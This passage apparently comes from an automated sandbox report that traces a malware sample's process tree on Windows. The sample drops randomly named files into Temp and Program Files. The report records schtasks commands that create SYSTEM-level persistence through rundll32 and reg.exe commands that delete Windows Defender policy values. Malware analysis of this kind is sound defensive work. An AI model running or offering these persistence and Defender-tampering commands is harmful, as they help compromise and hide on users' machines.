                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Temp\PXrfLiKCfCnyikun\XtSdIWwFFlRGWGO\lTXAtVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\Temp\PXrfLiKCfCnyikun\XtSdIWwFFlRGWGO\lTXAtVC.exe ix /TRsite_idOGC 757674 /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops Chrome extension
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "bryKvsyaXJGRzVMfxC"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\avCYxHeOU\lFHTMT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "lcvWbCwDjHWVgcZ" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "lcvWbCwDjHWVgcZ2" /F /xml "C:\Program Files (x86)\avCYxHeOU\mDPxBzl.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /END /TN "lcvWbCwDjHWVgcZ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "lcvWbCwDjHWVgcZ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "poCvyoJUJWgLZs" /F /xml "C:\Program Files (x86)\bBzpULueDNPU2\hcPqMft.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "GmVLDmXNFwqUH2" /F /xml "C:\ProgramData\MIYLeEeCYBaCXaVB\SXQosJB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "QMxFFQlBEgedorFev2" /F /xml "C:\Program Files (x86)\ytxvjsDOVNaLISvqIgR\AumQiet.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "gSGaBJLiZWbuFJsqmMc2" /F /xml "C:\Program Files (x86)\aVcWpEvkOHYsC\OZQKSIZ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "UhkkYEOaauSGJWUyQ" /SC once /ST 08:54:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PXrfLiKCfCnyikun\xVlKkNIM\ySkMqGF.dll\",#1 /Zpsite_idVNY 757674" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /run /I /tn "UhkkYEOaauSGJWUyQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "giVDh1" /SC once /ST 12:10:33 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /run /I /tn "giVDh1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "giVDh1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "lEnXrdVyZebfdxnHp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PXrfLiKCfCnyikun\xVlKkNIM\ySkMqGF.dll",#1 /Zpsite_idVNY 757674
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PXrfLiKCfCnyikun\xVlKkNIM\ySkMqGF.dll",#1 /Zpsite_idVNY 757674
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "UhkkYEOaauSGJWUyQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe8b899758,0x7ffe8b899768,0x7ffe8b899778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2268 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3152 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3524 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4536 --field-trial-handle=1980,i,10317511038195299990,12242680014035878362,131072 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7464 -ip 7464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultb7665cc2h9ffah438bha78dha3893390090d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe8a0146f8,0x7ffe8a014708,0x7ffe8a014718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,18202414710866729155,11112988469228923740,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,18202414710866729155,11112988469228923740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,18202414710866729155,11112988469228923740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
